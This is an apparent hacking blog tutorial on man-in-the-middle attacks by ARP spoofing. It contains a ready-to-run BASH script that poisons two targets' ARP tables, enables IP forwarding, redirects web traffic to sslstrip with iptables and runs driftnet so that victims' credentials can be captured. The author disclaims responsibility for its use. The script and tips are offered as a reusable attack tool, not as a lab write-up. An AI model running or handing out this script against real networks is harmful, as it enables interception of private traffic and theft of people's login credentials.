Attack Scripting 101: The MiTM
After a while of learning how to preform attacks and exploits it become monotonous, your memory becomes dull, and your knowledge of certain attacks wane. This is a common occurrence with Penetration Testers and Hackers alike. Many of them have come up with ways to get past this memory block, and the most common way of keeping the information in a usable form is writing some kind of Attack Script that automates some of your exploits and attacks. Today I will be explaining the MiTM or Man in the Middle attack and how to write an attack script to automate this process. Anything you do with this script however I can not be held accountable for.
Choosing your Language
To start with, if you already know a programming language and are proficient coding with it feel free to adapt the script to suit your needs and comfort levels. However I am going to be primarily using BASH in my examples.
I make it a rule and a habit that any automation that I code myself I will still leave it somewhat extendable. I will make all the variables changeable and keep it as a piece of software that I will reuse. You need to learn that it’s not your place to re-invent the wheal, only make it roll more efficiently and in essence thats all your trying to do.
The MiTM Explanation
A Man in the Middle Attack is an attack in which you essentially tell two targets that you are the other. Both clients then send you data meant for the other, and you essentially use something (IPTables in our case) to forward the traffic through your machine to the correct clients. Now you are essentially what is a router, by becoming a router you can now turn on a Sniffer and capture all of the data going in-between the targets. This form of attack is especially common on local networks so watch for it on public networks. The specific attack we are going to use is known as ARP Spoofing. ARP spoofing is the only major spoofing attack that can work on a network with more then 1 Collision Domain (a Collision Domain is essentially a subnetwork from the main network). ARP Spoofing uses targets ARP tables to force them to send traffic to your machine.
The MiTM Automation Code
This is just a rough BASH script that would allow you to simply ARP-Poison any network and then pull credentials that are secure or insecure. I’m not going to go into to much detail as to what methods I used to actually arp-poison the network as that will be in another guide, I am simply trying to help you understand the basics.
#!/bin/bash echo "Hello and Welcome to Arp-Pose" echo "" echo "" echo "Please enter your Target's IP" read Target echo "Please enter your Target2's IP" read Target2 echo "Please enter your Interface" read Interface echo "1" > /proc/sys/net/ipv4/ip_forward arpspoof -t $Target $Target2 & > /dev/null iptables -t nat -A PREROUTING -p TCP --destination-port 80 -j REDIRECT --to-port 10000 driftnet & > /dev/null xterm -e "python /pentest/web/sslstrip/sslstrip.py -p 10000" #Cleanup Process. echo "0" > /proc/sys/net/ipv4/ip_forward pkill driftnet pkill arpspoof #/Cleanup Process.
Tips and Tricks
- Don’t attempt to rewrite already provided functions of a program.
- Don’t get to hung up on any Programming Language use the right tool for the job.
- Don’t get yourself locked into a small scope, write all of your scripts so they are highly configurable for different instances.
- Choose a naming system and stick with it. <- I.E. mitm.sh, dnsspoof.sh, autowepcrack.sh
- Enjoy and don’t be afraid to ask for help!